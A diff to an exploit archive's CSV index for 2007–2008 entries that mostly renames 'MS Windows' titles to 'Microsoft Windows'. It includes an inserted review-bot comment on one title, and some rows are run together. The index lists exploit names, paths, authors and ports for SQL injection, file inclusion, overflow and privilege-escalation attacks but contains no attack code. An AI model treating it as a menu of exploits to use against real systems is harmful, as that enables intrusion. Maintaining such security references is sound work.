 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
@@ -3083,7 +3083,7 @@ id,file,description,date,author,platform,type,port
 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0
 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0
 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0
-3419,platforms/windows/dos/3419.txt,"MS Windows (.doc File) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0
+3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc File) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0
 3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0
 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0
 3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0
@@ -3115,7 +3115,7 @@ id,file,description,date,author,platform,type,port
 3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0
 3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)",2007-03-10,"Cesar Cerrudo",windows,local,0
 3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0
-3453,platforms/windows/dos/3453.py,"MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0
+3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0
 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0
 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 (search.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0
 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 (viewcat.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0
@@ -3275,7 +3275,7 @@ id,file,description,date,author,platform,type,port
 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0
 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53
 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
-3617,platforms/windows/local/3617.cpp,"MS Windows Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
+3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
 3620,platforms/php/webapps/3620.pl,"XOOPS Module Core (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
@@ -3292,9 +3292,9 @@ id,file,description,date,author,platform,type,port
 3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability",2007-04-01,Dj7xpl,php,webapps,0
 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0
 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0
-3634,platforms/windows/remote/3634.txt,"MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0
-3635,platforms/windows/remote/3635.txt,"MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0
-3636,platforms/windows/remote/3636.txt,"MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0
+3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0
+3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0
+3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0
 3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion Vulnerability",2007-04-02,ka0x,php,webapps,0
 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0
 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0
@@ -3302,12 +3302,12 @@ id,file,description,date,author,platform,type,port 3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section <= 1.01 (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3647,platforms/windows/local/3647.c,"MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 +3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3650,platforms/windows/remote/3650.c,"Frontbase <= 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 -3651,platforms/windows/remote/3651.txt,"MS Windows Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 -3652,platforms/windows/local/3652.c,"MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 +3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 +3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL 
Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 
@@ -3338,18 +3338,18 @@ id,file,description,date,author,platform,type,port 3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 -3684,platforms/windows/dos/3684.c,"MS Windows Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 +3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 -3688,platforms/windows/local/3688.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 +3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)",2007-04-09,"Breno Silva 
Pinto",windows,local,0 -3693,platforms/windows/dos/3693.txt,"MS Windows .HLP File Local HEAP Overflow PoC 0day",2007-04-09,muts,windows,dos,0 +3693,platforms/windows/dos/3693.txt,"Microsoft Windows - .HLP File Local HEAP Overflow PoC (0day)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion Vulnerability",2007-04-09,Dj7xpl,php,webapps,0 -3695,platforms/windows/local/3695.c,"MS Windows Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 +3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion Vulnerability",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution Vulnerability",2007-04-10,Dj7xpl,php,webapps,0 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability",2007-04-10,c0ntex,linux,remote,0 
@@ -3390,10 +3390,10 @@ id,file,description,date,author,platform,type,port
 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0
 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0
 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0
-3737,platforms/windows/remote/3737.py,"MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)",2007-04-15,"Winny Thomas",windows,remote,139
+3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow Exploit",2007-04-15,"Winny Thomas",windows,remote,139
 3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80
 3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0
-3740,platforms/windows/remote/3740.c,"MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139
+3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139
 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability",2007-04-15,irvian,php,webapps,0
 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0
 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0
@@ -3408,7 +3408,7 @@ id,file,description,date,author,platform,type,port
 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0
 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0
 3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0
-3755,platforms/windows/local/3755.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
+3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0
 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 Local Format String Exploit",2007-04-17,jamikazu,windows,local,0
 3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0
@@ -3457,7 +3457,7 @@ id,file,description,date,author,platform,type,port
 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0
 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability",2007-04-26,koray,php,webapps,0
 3803,platforms/php/webapps/3803.txt,"phpOracleView (include_all.inc.php page_dir) RFI Vulnerability",2007-04-26,"Alkomandoz Hacker",php,webapps,0
-3804,platforms/windows/remote/3804.txt,"MS Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
+3804,platforms/windows/remote/3804.txt,"Microsoft Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0
 3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0
 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0
@@ -3577,7 +3577,7 @@ id,file,description,date,author,platform,type,port
 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0
 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0
 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113
-3926,platforms/windows/dos/3926.py,"MS Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0
+3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0
 3927,platforms/windows/remote/3927.html,"DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0
 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability",2007-05-15,Katatafish,php,webapps,0
 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0
@@ -3694,7 +3694,7 @@ id,file,description,date,author,platform,type,port
 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0
 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0
 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0
-4044,platforms/windows/dos/4044.txt,"MS Windows GDI+ ICO File - Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0
+4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0
 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0
 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0
 4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0
@@ -3859,7 +3859,7 @@ id,file,description,date,author,platform,type,port
 4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 (search) Remote Code Execution Vulnerability",2007-07-22,"Johannes Greil",php,webapps,0
 4213,platforms/php/webapps/4213.txt,"bwired (index.php newsID) Remote SQL Injection Vulnerability",2007-07-22,g00ns,php,webapps,0
 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0
-4215,platforms/windows/dos/4215.pl,"MS Windows Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0
+4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0
 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0
 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0
 4218,platforms/windows/local/4218.php,"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0
@@ -3981,7 +3981,7 @@ id,file,description,date,author,platform,type,port
 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0
 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0
 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0
-4337,platforms/windows/dos/4337.c,"MS Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
+4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0
 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability",2007-08-29,SmOk3,php,webapps,0
 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0
@@ -4387,7 +4387,7 @@ id,file,description,date,author,platform,type,port
 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0
 4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0
-4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
+4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0
 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0
 4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0
@@ -4401,7 +4401,7 @@ id,file,description,date,author,platform,type,port
 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0
 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0
 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0
-4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
+4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0
 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0
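Review bot: The new title for 4760 puts the separator between the product and its edition, giving `Microsoft Windows 2000 - AS SP4 - Message Queue Exploit (MS07-065)`, so the edition and service pack no longer read as part of the product string. The other renamed rows keep the version with the product, for example 5518 with `Microsoft Windows XP SP2 - (win32k.sys) ...`. I would write this one as `"Microsoft Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)"` so that title searches by product and service pack match consistently.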
@@ -4573,7 +4573,7 @@ id,file,description,date,author,platform,type,port
 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0
 4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BOF Exploit",2008-01-17,rgod,windows,remote,0
 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0
-4934,platforms/windows/remote/4934.c,"MS Windows Message Queuing Service RPC BOF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0
+4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service RPC BOF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0
 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0
 4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability",2008-01-18,Syndr0me,php,webapps,0
 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion Vulnerability",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0
@@ -4958,7 +4958,7 @@ id,file,description,date,author,platform,type,port
 5324,platforms/php/webapps/5324.txt,"KISGB <= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability",2008-03-30,Cr@zy_King,php,webapps,0
 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability",2008-03-30,v0l4arrra,php,webapps,0
 5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download (dl_id) SQL Injection Vulnerability",2008-03-31,BL4CK,php,webapps,0
-5327,platforms/windows/dos/5327.txt,"MS Windows Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0
+5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0
 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0
 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,N/A,php,webapps,0
 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)",2008-03-31,Heretic2,windows,remote,80
@@ -5072,7 +5072,7 @@ id,file,description,date,author,platform,type,port
 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0
 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0
 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0
-5442,platforms/windows/local/5442.cpp,"MS Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
+5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0
 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0
 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0
 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954
@@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port
 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0
 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0
-5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
+5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0
 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0
 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0
 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
@@ -6036,7 +6036,7 @@ id,file,description,date,author,platform,type,port
 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0
